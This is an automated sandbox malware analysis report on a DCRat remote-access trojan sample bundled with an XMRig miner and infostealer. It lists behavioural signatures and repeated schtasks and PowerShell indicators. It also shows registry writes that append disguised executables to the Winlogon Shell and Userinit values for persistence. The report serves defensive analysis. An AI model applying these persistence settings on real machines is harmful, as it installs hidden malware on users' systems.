Malware Analysis Report

2024-11-15 05:52

Sample ID 240721-y6s92avgqn
Target 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab
SHA256 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab
Tags
rat dcrat execution infostealer persistence privilege_escalation spyware stealer xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab

Threat Level: Known bad

The file 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab was found to be: Known bad.

Malicious Activity Summary

rat dcrat execution infostealer persistence privilege_escalation spyware stealer xmrig miner

DCRat payload

Process spawned unexpected child process

Dcrat family

Modifies WinLogon for persistence

xmrig

DcRat

XMRig Miner payload

DCRat payload

Command and Scripting Interpreter: PowerShell

Event Triggered Execution: AppInit DLLs

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

.NET Reactor protector

Reads user/profile data of web browsers

Looks up external IP address via web service

Adds Run key to start application

Blocklisted process makes network request

Enumerates connected drives

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Modifies system certificate store

Suspicious use of WriteProcessMemory

Scheduled Task/Job: Scheduled Task

Modifies registry class

Runs ping.exe

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-21 20:24

Signatures

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Dcrat family

dcrat

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-21 20:24

Reported

2024-07-21 20:26

Platform

win7-20240704-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Office\14.0\Common C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\", \"C:\\Windows\\twain_32\\sppsvc.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\", \"C:\\Users\\All Users\\Microsoft\\Windows\\explorer.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\", \"C:\\Windows\\twain_32\\sppsvc.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\", \"C:\\Users\\All Users\\Microsoft\\Windows\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\", \"C:\\Windows\\twain_32\\sppsvc.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\", \"C:\\Users\\All Users\\Microsoft\\Windows\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wscript.exe\", \"C:\\Recovery\\7da403a2-3a8c-11ef-b191-d685e2345d05\\Bloxstrap.exe\", \"C:\\Users\\Admin\\AppData\\Local\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\", \"C:\\Windows\\twain_32\\sppsvc.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Roaming\\xdwdSublime Text.exe" C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\", \"C:\\Windows\\twain_32\\sppsvc.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\", \"C:\\Users\\All Users\\Microsoft\\Windows\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wscript.exe\", \"C:\\Recovery\\7da403a2-3a8c-11ef-b191-d685e2345d05\\Bloxstrap.exe\", \"C:\\Users\\Admin\\AppData\\Local\\Roblox.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\", \"C:\\Windows\\twain_32\\sppsvc.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\", \"C:\\Windows\\twain_32\\sppsvc.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\", \"C:\\Users\\All Users\\Microsoft\\Windows\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wscript.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\lsass.exe\", \"C:\\DriversavessessionDlldhcp\\services.exe\", \"C:\\MSOCache\\All Users\\Refcrt.exe\", \"C:\\Program Files\\Common Files\\csrss.exe\", \"C:\\Users\\Admin\\Music\\csrss.exe\", \"C:\\Windows\\twain_32\\sppsvc.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\", \"C:\\Users\\All Users\\Microsoft\\Windows\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wscript.exe\", \"C:\\Recovery\\7da403a2-3a8c-11ef-b191-d685e2345d05\\Bloxstrap.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\System.exe\", \"C:\\Windows\\Registration\\CRMLog\\csrss.exe\", \"C:\\Windows\\AppPatch\\ja-JP\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Event Triggered Execution: AppInit DLLs

persistence privilege_escalation

